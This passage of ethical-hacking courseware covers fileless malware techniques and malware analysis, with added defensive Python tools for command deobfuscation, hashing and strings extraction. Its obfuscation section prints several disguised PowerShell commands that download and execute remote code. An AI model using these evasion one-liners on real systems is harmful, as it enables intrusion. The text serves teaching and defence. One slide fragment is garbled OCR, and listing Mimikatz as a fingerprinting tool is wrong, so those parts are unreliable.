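    # a macro part inside a file whose extension promises "no macros" is tampering
    ext = filename.lower().rsplit(".", 1)[-1]
    result["extension_mismatch"] = result["has_vba_part"] and ext in ("docx", "xlsx", "pptx")
    return result


def is_macro_enabled(data, filename):
    """True if either the part or the content-type declaration is present."""
    r = inspect_ooxml(data, filename)
    return r["has_vba_part"] or r["declares_vba"]


def build_sample(with_vba):
    """Constructed minimal OOXML-like container (not a valid Word file)."""
    override = ('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>'
                % VBA_CONTENT_TYPE) if with_vba else ""
    ct = ('<?xml version="1.0" encoding="UTF-8"?>'
          '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
          '<Default Extension="xml" ContentType="application/xml"/>'
          + override + '</Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", ct)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            # placeholder bytes standing in for a real (OLE compound) VBA project
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, doc in (("invoice.docm", build_sample(True)),
                      ("invoice.docx", build_sample(True)),   # renamed to look harmless
                      ("report.docx", build_sample(False))):
        print(name, inspect_ooxml(doc, name))
```

Checking both the part and the declaration matters: a crafted file can drop one of the two, and Office is forgiving about which it honours. The extension mismatch is worth blocking on its own, since a macro project inside a .docx is never produced by a legitimate save.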

Launching Fileless Malware through In-Memory Exploits
Attackers can inject a malicious payload into the running memory (RAM) of legitimate processes without leaving any footprints on disk. Such an intrusion is extremely difficult for antivirus software to detect, as the payload is not stored on local disks but is directly executed from memory. Attackers exploit different APIs or Windows admin tools such as Windows Management Instrumentation (WMI), PsExec, and PowerShell to gain access to the process memory of a legitimate process. Attackers employ the reflective Dynamic Link Library (DLL) injection method to load a malicious DLL into a host-side process without writing the DLL to disk.
EternalBlue is a type of in-memory exploit that leverages flaws in the Windows file sharing protocol known as Server Message Block version 1 (SMBv1). Exploiting this client-server communication protocol gives the attacker code execution on an unpatched target. The attacker then targets the Local Security Authority Subsystem Service process (lsass.exe), injecting malicious code. lsass.exe is designed to handle login/logout and validate user credentials, and it also performs other critical operations. The attacker exploits this process to launch further attacks while evading security, using tools such as Mimikatz to access credential details (cleartext passwords and password hashes) from its memory.
Figure 7.61: Delivering payloads using in-memory exploits
Launching Fileless Malware through Script-based Injection

Launching Fileless Malware through Script-based Injection
Fileless attacks are also performed using scripts whereby binaries and shellcode are embedded, obfuscated, and compiled to avoid file creation on the disk. Scripts allow attackers to communicate with and infect applications or operating systems without being traced. They are also useful in finding design flaws and vulnerabilities in the applications. Scripts are usually flexible, and they can be executed from any files or directly from memory. The attacker leverages this feature along with the vulnerabilities in a system to inject malicious scripts directly into memory via PowerShell to evade detection. Once the attacker gains control of the target system, he/she can execute these scripts directly on a command-line interface from a remote location to spread infections and initiate other malicious activities. Many classical fileless threats such as KOVTER, POWMET, and FAREIT have used malicious scripts to spread malware.
Figure 7.62: Launching fileless malware through script-based injection
Launching
Fileless Malware byExploiting
System
Admin Tools

(©Atachersexpo
(© default
tools a dmin
system
Aacherswe Certtl andWindows
such
Management
a Cert, WMI andRegavr32

interface
Command lunch
to
infections
flees
(WMI) utestaste! infrmation
(©They
and
commande teks such
explot a5 Regsw32, rundal2to run maiious DLS

El

Fileless Malware byExploiting


Launching Admin Tools
System
The attacker exploits default system admin tools, features, and other utilities of a system to spread fileless infections. Attackers use Certutil and Windows Management Interface Command (WMIC) utilities to steal the information. They also exploit command-line tools such as Microsoft registered server (Regsvr32) and rundll32 to run malicious DLLs. The exploited command lines enable the attacker to install altered versions of pen testing tools to gain complete access to the target system. The modified tools are used to access payloads, maintain persistence, steal and export information, and expand malware. As they appear to be authentic tools, they can evade the security mechanism of any traditional antivirus software. An attacker can exploit system tools such as remote desktops, command-oriented tools such as regsvr32, PowerShell, rundll32, certUtil, and WMIC, and pen testing tools such as Mimikatz and Cobalt Strike. Using this technique, attackers can steal critical information from the system, such as credentials, to launch further attacks.

Figure 7.63: Launching fileless malware by abusing sysadmin tools

Launching Fileless Malware through Phishing

Attackers commonly use social engineering techniques such as phishing to spread fileless malware to the target systems. They send spam emails embedded with malicious links to the victim. When the victim clicks on the link, he/she will be directed to a fraudulent website that automatically loads Flash and triggers the exploit. Furthermore, the fileless malware scans the target system for vulnerabilities in system tools such as PowerShell, WMI, and browser Java plug-ins. The malware exploits the identified vulnerability to download and run the malicious payload on the victim's machine and compromises the sensitive information stored in the process memory. Fileless threats can also maintain persistence by creating AutoStart registry entries depending on the goal of the attacker.

Steps followed by the attacker to launch fileless malware through phishing:

Figure 7.64: Launching fileless malware through phishing

1. The attacker sends a phishing email to the victim, embedded with a malicious link
2. When the victim opens the email and clicks on the malicious link, the victim is automatically redirected to a fake website
3. The fake website scans for vulnerabilities in the system, such as outdated Flash, to trigger the exploit
4. Now, the fileless malware exploits system tools such as PowerShell to load and run the malicious payloads in memory. PowerShell downloads the malicious payloads from a remote command-and-control server
5. The AutoStart registry key is created for storing the malicious script in the victim's system to maintain persistence
6. Once the malicious payload is injected, it steals critical information, performs data exfiltration, and sends all the data to the attacker

Maintaining Persistence with Fileless Techniques

Once any malware enters a system, server, or network, it remains intact for a long time. Unlike other malware types, fileless malware does not use disk files to spread its infection or maintain persistence. Therefore, attackers adopt unique methods such as developing load points to restart infected payloads to maintain the persistence of fileless malware. Attackers save the malicious payload inside the registry that holds data for configurations, application files, and settings. After loading the malicious code into the system registry keys, this code executes itself with every system restart or when a certain shortcut file is accidentally clicked. Attackers can also exploit the Windows task scheduler to activate scripts and run them at a specific time. The scheduled task activates the malware inside the registry at regular intervals of time to spread infections in the system.

Attackers can also maintain persistence by exploiting WMI, which is designed to handle various systems and devices in a network. Attackers store the malicious scripts inside the WMI repository, and they can later run them using WMI utilities. Then, the stored scripts can further exploit the vulnerable systems in a network and spread the infection.

Figure 7.65: Maintaining persistence with fileless techniques

Fileless Malware: Divergent

Divergent is a type of fileless malware that exploits NodeJS, which is a program that executes JavaScript outside the browser. Using Divergent fileless malware, attackers generate revenue by targeting corporate networks through click-fraud attacks. It strongly depends on the registry for the execution and storage of configuration data. Furthermore, it employs a key in the registry to maintain persistence and exploits PowerShell to inject itself into the other processes on the infected machine. If the infected process is running with the required privileges, it exploits WMI to gather information related to antivirus software such as Windows Defender installed on the target system. If Windows Defender is installed on the target system, it automatically disables various components of Windows Defender and Windows Updates. After infecting the system, it bypasses UAC through CMSTP.exe (Microsoft Connection Manager Profile Installer) and steals critical information from the victim through URLs.

Figure 7.66: Screenshot of Divergent

Some additional fileless malware are as follows:
- Astaroth Backdoor
- Nodersok
- Vaporworm
- njRat Backdoor
- Sodinokibi Ransomware
- Kovter and Poweliks
- Dridex
- Hancitor/Chanitor
- Sorebrect Ransomware

Fileless Malware Obfuscation Techniques to Bypass Antivirus

Nowadays, attackers are leveraging fileless malware to perform cyber-attacks on target organizations, as such malware hides itself from traditional antivirus solutions. Furthermore, fileless malware does not store anything on the disk; hence, it is extremely difficult to detect such attacks. In addition, attackers adopt various obfuscation techniques to keep their malicious activities hidden and undetected for as long as possible.

The various obfuscation techniques used by fileless malware to bypass antivirus solutions are discussed below:

Inserting Characters
Attackers insert special characters such as commas (,) and semicolons (;) between malicious commands and strings to make well-known commands more difficult to detect. These special characters are considered as whitespace characters in command-line arguments; hence, they are processed easily. Using this technique, attackers break malicious strings to evade parsing of malicious commands by signature-based solutions.

    cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')&&echo exit

Inserting Parentheses
In general scenarios, parentheses are used to improve the readability of the code, group complex expressions, and split commands. When parentheses are used, variables of a code block are considered and evaluated just as a single-line command. Attackers exploit this feature to split and obfuscate malicious commands.

    cmd.exe /c ((echo command1) && (echo command2))

Inserting Caret Symbol
The caret symbol (^) is generally a reserved character used in shell commands for escaping. Attackers exploit this feature to escape malicious commands at execution time. For this purpose, they insert single or double caret symbols inside a malicious command.

    C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')&&echo exit

When the above command is executed, the first caret symbol is escaped:

    C:\WINDOWS\system32\cmd.exe /c p^o^w^e^r^s^h^e^l^l^.^e^x^e -No^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')&&echo exit

After the second caret symbol is also escaped, powershell.exe is executed with a command-line argument:

    C:\WINDOWS\system32\cmd.exe /c powershell.exe -NoExit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')&&echo exit

Inserting Double Quotes
When a command is embedded with double quotes, it does not affect the normal execution of the command. Furthermore, the command-line parser uses a double quote symbol as an argument delimiter. Attackers use double quote symbols to concatenate malicious commands in arguments.

    Pow""er""Shell -N""oExit -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Flower.jpg

Using Custom Environment Variables
Another method adopted by attackers to obfuscate fileless malware is using environment variables. In Windows operating systems, environment variables are dynamic objects that store modifiable values used by applications at run time. Attackers exploit environment variables to split malicious commands into multiple strings. Furthermore, they set the value for the environment variable at run time to execute malicious commands.

    set a=Power &&set b=Shell &&%a:~0,-1%%b% -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Products.pdf

Using Pre-assigned Environment Variables
Another technique exploited by attackers is retrieving specific characters from pre-assigned environment variables such as "CommonProgramFiles." The characters in such variables are referred through the index and exploited by attackers to execute malicious commands. "%CommonProgramFiles%" contains a default value "C:\Program Files\Common Files." Specific characters from this value can be accessed through indexing and used to execute malicious commands as follows:

    cmd.exe /c "%CommonProgramFiles:~3,1%owerShell.exe" -windowstyle hidden -command wscript myscript.vbe

The above command retrieves a single character 'P' at index 3, which is concatenated with "owerShell.exe", and executes the malicious command.
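As an added defensive illustration (not code from the courseware), the following Python script undoes the tricks listed above, and covers the abused system tools named in the admin-tools section as well, so that a signature or log-review rule sees the real command: it applies cmd.exe caret escaping, drops inserted double quotes, resolves %VAR% and %VAR:~start,len% expansions (including variables set earlier on the same line), treats commas and semicolons as whitespace, strips grouping parentheses, and then reports which of the chapter's abused binaries the line actually invokes. The pre-assigned variable value and the sample command lines are constructed, and the binary list and matching rule are assumptions rather than any product's logic.

```python
import re

# Constructed default for a pre-assigned variable (assumption: stock Windows
# install path); variables defined with "set" inside the command line itself
# are read from that command line.
PRE_ASSIGNED_ENV = {"COMMONPROGRAMFILES": r"C:\Program Files\Common Files"}

# System binaries this chapter names as abused by fileless malware.
LOLBINS = ("powershell", "cmd", "wscript", "cscript", "certutil",
           "regsvr32", "rundll32", "wmic", "cmstp")
LOLBIN_RE = re.compile(r"(?<![\w.])(" + "|".join(LOLBINS) + r")(?:\.exe)?(?![\w.])", re.I)
CARET_RE = re.compile(r"\^(.)")                             # cmd.exe escape: ^X -> X
SET_RE = re.compile(r"\bset\s+(\w+)=([^&|]*)", re.I)        # set a=Power &&...
VAR_RE = re.compile(r"%(\w+)(?::~(-?\d+)(?:,(-?\d+))?)?%")  # %a%, %a:~3,1%, %a:~0,-1%


def unescape_carets(cmdline: str) -> str:
    """Apply cmd.exe caret escaping repeatedly (^^ -> ^ -> nothing), mirroring
    the two-stage evaluation shown above; a trailing lone caret is dropped."""
    while True:
        stripped = CARET_RE.sub(r"\1", cmdline)
        if stripped == cmdline:
            return stripped.replace("^", "")
        cmdline = stripped


def expand_env(cmdline: str, env: dict) -> str:
    """Resolve %VAR%, %VAR:~start% and %VAR:~start,len% (cmd.exe substring
    syntax) using pre-assigned values plus any "set NAME=value" on the line."""
    table = {k.upper(): v for k, v in env.items()}
    for name, value in SET_RE.findall(cmdline):
        table[name.upper()] = value                  # keeps trailing spaces, as cmd does

    def substitute(m):
        name, start, length = m.group(1).upper(), m.group(2), m.group(3)
        if name not in table:
            return m.group(0)                        # unknown variable: leave as-is
        value = table[name]
        if start is None:
            return value
        s = int(start)
        if length is None:
            return value[s:]
        n = int(length)
        return value[s:n] if n < 0 else value[s:s + n]   # negative len counts from the end

    return VAR_RE.sub(substitute, cmdline)


def normalize(cmdline: str, env: dict = PRE_ASSIGNED_ENV) -> str:
    """Undo the obfuscation tricks so a signature sees the intended command."""
    text = unescape_carets(cmdline)
    text = text.replace('"', "")                     # Pow""er""Shell -> PowerShell
    text = expand_env(text, env)                     # %CommonProgramFiles:~3,1% -> P
    text = re.sub(r"[,;()]", " ", text)              # commas/semicolons act as whitespace;
    return " ".join(text.split())                    # grouping parentheses carry no meaning


def find_lolbins(cmdline: str) -> list:
    """Sorted, de-duplicated list of the listed binaries the normalized line invokes."""
    return sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(normalize(cmdline))})


# Constructed samples modelled on the obfuscated commands quoted in this section.
SAMPLES = [
    "cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression "
    "(New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')",
    "C:\\WINDOWS\\system32\\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass",
    'Pow""er""Shell -N""oExit -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Flower.jpg',
    "set a=Power &&set b=Shell &&%a:~0,-1%%b% -ExecutionPolicy bypass -windowstyle hidden",
    'cmd.exe /c "%CommonProgramFiles:~3,1%owerShell.exe" -windowstyle hidden -command wscript myscript.vbe',
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(f"{find_lolbins(raw)}  <-  {normalize(raw)}")
```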

Malware Analysis
Malware is a program designed to perform malicious activities (the term itself is a contraction of "malicious software"). Malware such as viruses, Trojans, worms, spyware, and rootkits allow an attacker to breach security defenses and subsequently launch attacks on target systems. Thus, to find and fix existing infections and thwart future attacks, it is necessary to perform malware analysis. Many tools and techniques are available to perform such tasks. This section explains the malware analysis procedure and discusses the various tools used to accomplish it.

What is Sheep Dip Computer?

Sheep dipping is a process used in sheep farming, whereby sheep are dipped in chemical solutions to make them parasite-free. In information security and malware analysis, sheep dipping refers to the analysis of suspicious files, incoming messages, etc., for malware. The users isolate the sheep-dipped computer from other computers on the network to block any malware from entering the system. Before performing this process, it is important to save all downloaded programs on external media such as CD-ROMs or DVDs.

A computer used for sheep dipping should have tools such as port monitors, file monitors, network monitors, and one or more antivirus programs for performing malware analysis of files, applications, incoming messages, external hardware devices (such as USB and pen drive), and so on.

Some tasks that are typically run during the sheep dipping process are as follows:
- Run user, group permission, and process monitors
- Run port and network monitors
- Run device driver and file monitors
- Run registry and kernel monitors


Antivirus Sensor Systems
An antivirus sensor system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. It is used along with sheep dip computers.

Figure 7.67: Screenshot displaying the working of Antivirus Sensor System

Introduction to Malware Analysis

Attackers use sophisticated malware techniques as cyber-weapons to steal sensitive data. The malware can inflict intellectual and financial losses on the target, regardless of whether it is an individual, a group of people, or an organization. Moreover, it spreads from one system to another with ease and stealth.

Malware analysis is a process of reverse engineering a specific piece of malware to determine its origin, functionality, and potential impact. By performing malware analysis, one can extract detailed information about the malware. Malware analysis is an integral part of any penetration testing process.

Why Malware Analysis?
The primary objectives of analyzing a malicious program are as follows:
- Determine what exactly happened
- Determine the malicious intent of the malware
- Identify the indicators of compromise
- Determine the complexity level of an intruder
- Identify the exploited vulnerability
- Identify the extent of damage caused by the intrusion
- Catch the perpetrator responsible for installing the malware
- Find signatures for host and network-based intrusion detection systems
- Evaluate the harm from an intrusion
- List the indicators of compromise for different machines and different malware programs
- Find the system vulnerability that the malware has exploited
- Distinguish the gatecrasher or insider responsible for the malware entry

The most common business questions answered by malware analysis are as follows:
- What is the intention of the malware?
- How did it get through?
- What is its impact on the business?
- Who are the perpetrators, and how good are they?
- How to abolish the malware?
- What are the losses?
- How long has the system been infected?
- What is the medium of the malware?
- What are the preventive measures?

Guidelines for Malware Analysis
The following guidelines are to be adopted while performing malware analysis:
- During malware analysis, pay attention to the essential features instead of understanding every detail
- Try different tools and approaches to analyze the malware, as a single approach may not be useful
- Identify, understand, and defeat new malware analysis prevention techniques

Types of Malware Analysis
The two types of malware analysis based on the approach methodology are static analysis and dynamic analysis.

Static Malware Analysis
It is also known as code analysis, and it involves going through the executable binary code without actually executing it to gain a better understanding of the malware and its purpose. The general static analysis involves scrutiny of the malware without executing the code or instructions. The process involves the use of different tools and techniques to determine the malicious part of a program or file. It also gathers information about malware functionality and collects the technical pointers or simple signatures that the malware generates. Such pointers include file name, MD5 checksums or hashes, file type, and file size.

Dynamic Malware Analysis
It is also known as behavioral analysis, and it involves executing the malware code to know how it interacts with the host system as well as its impact on the host system after it infects the system. Dynamic analysis involves the execution of malware to examine its conduct and operations, and it identifies technical signatures that confirm the malicious intent. It reveals information such as domain names, file path locations, created registry keys, IP addresses, additional files, installation files, DLL, and linked files located on the system or network.

Both techniques aim to understand how the malware works, but they differ in terms of the tools used as well as the time and skills required for performing the analysis. It is recommended that both static and dynamic analyses be performed to gain a deeper understanding of the functionality of malware.

Malware Analysis Procedure: Preparing Testbed

Malware Analysis Procedure
Malware analysis provides an in-depth understanding of each sample and identifies emerging technology trends from a vast collection of malware samples without actually executing them. The malware samples are mostly compatible with the Windows binary executable. There are various objectives for performing malware analysis.

It is extremely dangerous to analyze malware on production devices connected to production networks. Therefore, one should always analyze malware samples in a testing environment on an isolated network.

Malware analysis involves the following steps:
1. Preparing Testbed
2. Static Analysis
3. Dynamic Analysis

Preparing Testbed
Requirements to build a testbed:
- An isolated test network to host your testbed and isolated network services such as DNS
- Target machines installed with a variety of OS and configuration states (non-patched, patched, etc.)
- Virtualization snapshots and re-imaging tools to wipe and rebuild the target machine quickly

Some tools are required for testing. The important ones are listed below:

- Imaging tool: To get a clean image for forensics and prosecution purposes.
- File/data analysis: To perform static analysis of potential malware files.
- Registry/configuration tools: Malware infects the Windows registry and other configuration variables. These tools help to identify the last saved settings.
- Sandbox: To perform dynamic analysis manually.
- Log analyzers: The devices under attack record the activities of the malware and generate log files. These tools are used to extract the log files.
- Network capture: To understand how the malware leverages the network.

Steps to prepare the testbed:
- Step 1: Allocate a physical system for the analysis lab
- Step 2: Install a virtual machine (VMware, Hyper-V, etc.) on the system
- Step 3: Install guest OS on the virtual machine(s)
- Step 4: Isolate the system from the network by ensuring that the NIC card is in the "host only" mode
- Step 5: Simulate Internet services using tools such as INetSim (https://www.inetsim.org)
- Step 6: Disable "shared folders" and "guest isolation"
- Step 7: Install malware analysis tools
- Step 8: Generate the hash value of each OS and tool
- Step 9: Copy the malware to the guest OS

Supporting Tools for Malware Analysis:
Some supporting tools required to perform malware analysis are as follows:

Virtual Machine Tools:
- Hyper-V (https://docs.microsoft.com)
- Parallels Desktop 14 (https://www.parallels.com)
- Boot Camp (https://www.apple.com)
- VMware Workstation Pro (https://www.vmware.com)

Screen Capture and Recording Tools:
- Snagit (https://www.techsmith.com)
- Jing (https://www.techsmith.com)
- Camtasia (https://www.techsmith.com)
- Ezvid (https://www.ezvid.com)

Network and Internet Simulation Tools:
- NetSim Pro (https://tetcos.com)
- ns-3 (https://www.nsnam.org)
- Riverbed Modeler (https://www.riverbed.com)
- QualNet (http://web.scalable-networks.com)

Backup and Imaging Tools:
- Genie Backup Manager Pro (https://www.zoolz.com)
- Macrium Reflect Server (https://www.macrium.com)
- R-Drive Image (https://www.drive-image.com)
- O&O DiskImage 14 (https://www.oo-software.com)

Static Malware Analysis

Static analysis is the process of investigating an executable file without running or installing it. Thus, it is safe to conduct static analysis because the investigator does not install or execute the suspicious file. However, some malware does not need installation for performing malicious activities. Therefore, investigators should perform static analysis in a controlled environment.

Static analysis involves accessing the source code or binary code to find the data structures, function calls, call graphs, etc., that can represent malicious behavior. Investigators can use various tools to analyze binary code to understand the file architecture and impact on the system. Compiling the source code of a system into a binary executable results in data loss, which makes the analysis of the code more difficult. Analyzing the binary code provides information about the malware functionality, its network signatures, exploit packaging technique, dependencies involved, etc.

The procedure of examining a given binary without executing it is mostly manual. It requires the extraction of vital data, such as data structures, utilized functions, and call graphs, from the malicious file. This data cannot be viewed by the investigator after program compilation.

Some static malware analysis techniques are listed below:
- File fingerprinting
- Local and online malware scanning
- Performing strings search
- Identifying packing/obfuscation methods
- Finding the portable executables (PE) information
- Identifying file dependencies
- Malware disassembly

Static Malware Analysis: File Fingerprinting

File fingerprinting is a process of computing the hash value for a given binary code to identify and track data across a network. This process includes the calculation of cryptographic hashes of the binary code to recognize its function and compare it with other binary code and programs from previous scenarios. The computed hash value can be used to uniquely identify the malware or periodically verify if any changes are made to the binary code during analysis. These fingerprints are used to track and identify similar programs from a database. Fingerprinting does not work for certain record types, including encrypted or password-secured files, images, audio, and video, which have different content compared to the predefined fingerprint.

Message-Digest Algorithm 5 (MD5) and Secure Hash Algorithm 1 (SHA-1) are the most commonly used hash functions for malware analysis. Various GUI-based tools such as HashMyFiles can be used to create a fingerprint of the suspicious file as part of the static analysis. HashMyFiles is a tool that can calculate various hash values.

- HashMyFiles
  Source: https://www.nirsoft.net
  HashMyFiles produces a hash value for a file using MD5, SHA1, CRC32, SHA-256, SHA-512, and SHA-384 algorithms. The program also provides information about the file, such as the full path of the file, date of creation, date of modification, file size, file attributes, file version, and extension, which helps in searching for and comparing similar files.
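The following Python script is an added example (not HashMyFiles or any courseware tool) of the fingerprinting workflow described above and of testbed step 8: it hashes each file with MD5, SHA-1 and SHA-256, stores the digests as a baseline manifest, and later reports any file whose digest no longer matches, which is the periodic change check the text describes. The file names and contents it creates are constructed for the demonstration.

```python
import hashlib
import json
import os
import tempfile

# MD5 and SHA-1 are the digests the text names; SHA-256 is added because
# collisions for the first two are practical, so a SHA-256 match is the one to trust.
ALGORITHMS = ("md5", "sha1", "sha256")


def fingerprint(path: str, chunk_size: int = 1 << 20) -> dict:
    """Hash a file with every algorithm in ALGORITHMS, streaming it in chunks so
    large samples and OS images do not have to fit in memory."""
    hashers = {name: hashlib.new(name) for name in ALGORITHMS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def fingerprint_bytes(data: bytes) -> dict:
    """Same digests for an in-memory blob (e.g. a sample just carved from an archive)."""
    return {name: hashlib.new(name, data).hexdigest() for name in ALGORITHMS}


def build_manifest(paths) -> dict:
    """Baseline every path; this is what testbed step 8 (hash each OS and tool) produces."""
    return {path: fingerprint(path) for path in paths}


def verify_manifest(manifest: dict) -> dict:
    """Re-hash everything in the manifest and return only the entries that changed
    or disappeared; an empty dict means lab tools and sample are still pristine."""
    changed = {}
    for path, expected in manifest.items():
        if not os.path.exists(path):
            changed[path] = "missing"
            continue
        current = fingerprint(path)
        differing = [name for name in ALGORITHMS if current[name] != expected[name]]
        if differing:
            changed[path] = "modified (" + ", ".join(differing) + ")"
    return changed


def demo() -> dict:
    """Constructed walk-through: baseline two files, tamper with one, re-verify."""
    with tempfile.TemporaryDirectory() as lab:
        tool = os.path.join(lab, "analysis_tool.exe")
        sample = os.path.join(lab, "sample.bin")
        with open(tool, "wb") as fh:
            fh.write(b"MZ" + bytes(62) + b"constructed tool image")
        with open(sample, "wb") as fh:
            fh.write(b"constructed suspicious blob")
        manifest = build_manifest([tool, sample])
        with open(tool, "ab") as fh:                  # simulate the tool being tampered with
            fh.write(b"\x90")
        report = verify_manifest(manifest)
        return {os.path.basename(p): status for p, status in report.items()}


if __name__ == "__main__":
    print(json.dumps(fingerprint_bytes(b"abc"), indent=2))
    print(json.dumps(demo(), indent=2))
```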

Figure 7.68: Screenshot of HashMyFiles

Some additional file fingerprinting tools are as follows:
- Mimikatz (https://github.com)
- Hashtab (http://implbits.com)
- HashCalc (https://www.slavasoft.com)
- hashdeep (https://github.com)
- MD5sums (http://www.pc-tools.net)

Static Malware Analysis: Local and Online Malware Scanning

You can scan the binary code locally using well-known and up-to-date antivirus software. If the code under analysis is a component of a well-known malware, it may have already been discovered and documented by many antivirus vendors. You can also upload the code to websites such as VirusTotal to get it scanned by a wide variety of scan engines.

VirusTotal calculates the hash values of a suspicious file and compares them with online and offline malware databases to determine the existence of the recognized malicious code. This process simplifies further investigation by offering deeper insights into the code, its functionality, and other essential details.

- VirusTotal
  Source: https://www.virustotal.com
  VirusTotal is a free service that analyzes suspicious files and URLs. In addition, it facilitates the detection of viruses, worms, Trojans, etc. It generates a report that provides the total number of engines that marked the file as malicious, the malware name, and, if available, additional information about the malware.
  It also offers important details of the online file analysis, such as target machine, compilation timestamp, type of file, compatible processors, entry point, PE sections, data link libraries (DLLs), used PE resources, different hash values, IP addresses accessed or contained in the file, program code, and type of connections established.

Figure 7.69: Screenshot of VirusTotal

Some additional local and online malware scanning tools are as follows:
- Hybrid Analysis (https://www.hybrid-analysis.com)
- Cuckoo Sandbox (https://cuckoosandbox.org)
- Jotti (https://virusscan.jotti.org)
- Valkyrie Sandbox (https://valkyrie.comodo.com)
- Online Scanner (https://www.fortiguard.com)

Static Malware Analysis: Performing Strings Search

Software programs include some strings that are commands for performing specific functions such as printing output. Strings communicate information from the program to its user. Various existing strings can represent the malicious intent of a program, such as reading the internal memory or cookie data, embedded in the compiled binary code.

Searching through the strings can provide information about the basic functionality of any program. During malware analysis, search for the malicious string to determine the harmful actions that a program can perform. For instance, if the program accesses a URL, it will have that particular URL string stored in it. It is advisable to be alert while looking for strings and also search for the embedded and encrypted strings to detect the suspicious file.

Use tools such as BinText to extract embedded strings from executable files. Ensure that the tool can scan and display ASCII and Unicode strings as well. Some tools can extract all the strings and copy them to a text or document file. Use such tools to copy the strings to a text file to ease the task of searching for malicious strings.

- BinText
  Source: https://www.aldeid.com
  BinText is a text extractor that can extract text from any file. It can find plain ASCII text, Unicode text, and resource strings, providing useful information for each item.
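As an added example (not BinText's code), the Python script below does the two things the text asks of a strings tool: it pulls both ASCII and UTF-16LE (the Windows "Unicode") runs out of a binary with their offsets, then flags the ones that look like URLs, registry paths, script-host command lines or IP addresses so the analyst can start from the suspicious ones. The indicator patterns are an assumed starting set, and the sample binary is constructed in the script.

```python
import re

# Patterns that make an extracted string worth a closer look. Assumption: a
# starting set chosen from the examples in this section (URLs, registry paths,
# script hosts), not an exhaustive indicator list.
INDICATORS = {
    "url": re.compile(r"https?://[^\s\"'<>]+", re.I),
    "registry": re.compile(r"\b(?:HKLM|HKCU|HKEY_[A-Z_]+|SOFTWARE|SYSTEM)\\[\w\\ ]+", re.I),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "script": re.compile(r"\b(?:powershell|wscript|cscript|cmd\.exe|rundll32|regsvr32)\b", re.I),
}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return (offset, kind, text) for every printable run of at least min_len
    characters: kind "A" for ASCII, "U" for UTF-16LE (the two columns BinText shows)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "A", m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    found += [(m.start(), "U", m.group().decode("utf-16-le")) for m in utf16_re.finditer(data)]
    return sorted(found)


def flag_suspicious(strings: list) -> list:
    """Keep only strings matching an indicator, as (offset, kind, label, text)."""
    hits = []
    for offset, kind, text in strings:
        for label, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((offset, kind, label, text))
                break
    return hits


def sample_binary() -> bytes:
    """Constructed stand-in for an executable: DOS stub text, a section name,
    an ASCII URL, a UTF-16LE registry path and script command line, and an IP."""
    return (b"MZ\x90\x00" + bytes(12) + b"This program cannot be run in DOS mode.\r\n$"
            + bytes(8) + b".text\x00\x00\x00" + bytes(6)
            + b"http://example.invalid/w/index.php?a=1\x00" + bytes(5)
            + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le") + b"\x00\x00"
            + bytes(3) + "powershell -w hidden".encode("utf-16-le") + b"\x00\x00"
            + b"\x01\x02\x03\x04ab\x00" + b"192.168.0.10\x00")


if __name__ == "__main__":
    strings = extract_strings(sample_binary())
    for offset, kind, text in strings:
        print(f"{offset:08x} {kind} {text}")
    print("--- suspicious ---")
    for offset, kind, label, text in flag_suspicious(strings):
        print(f"{offset:08x} {kind} [{label}] {text}")
```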

Figure 7.70: Screenshot of BinText

Some additional string searching tools are as follows:
- FLOSS (https://www.fireeye.com)
- Strings (https://docs.microsoft.com)
- Free EXE DLL Resource Extract (http://www.resourceextract.com)
- FileSeek (https://www.fileseek.ca)
- Hex Workshop (http://www.hexworkshop.com)

Static Malware Analysis: Identifying Packing/Obfuscation Methods

Attackers use packing and obfuscation to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file and then run the unpacked file. This complicates reverse engineers' attempts to find out the actual program logic and other metadata via static analysis.

You should try to determine if the file includes packed elements and also locate the tool or method used for packing it. Use tools such as PEiD, which detects most commonly used packers, cryptors, and compilers for PE executable files. Finding the packer will ease the task of selecting a tool for unpacking the code.

- PEiD
  Source: https://www.aldeid.com
  PEiD is a free tool that provides details about Windows executable files. It can identify signatures associated with over 600 different packers and compilers. This tool also displays the type of packers used for packing the program. It also displays additional details such as entry point, file offset, EP section, and subsystem used for packing.

Figure: Screenshot of PEiD

Some additional packaging/obfuscation tools are as follows:
- Macro_Pack (https://github.com)
- UPX (https://upx.github.io)
- ASPack (http://www.aspack.com)


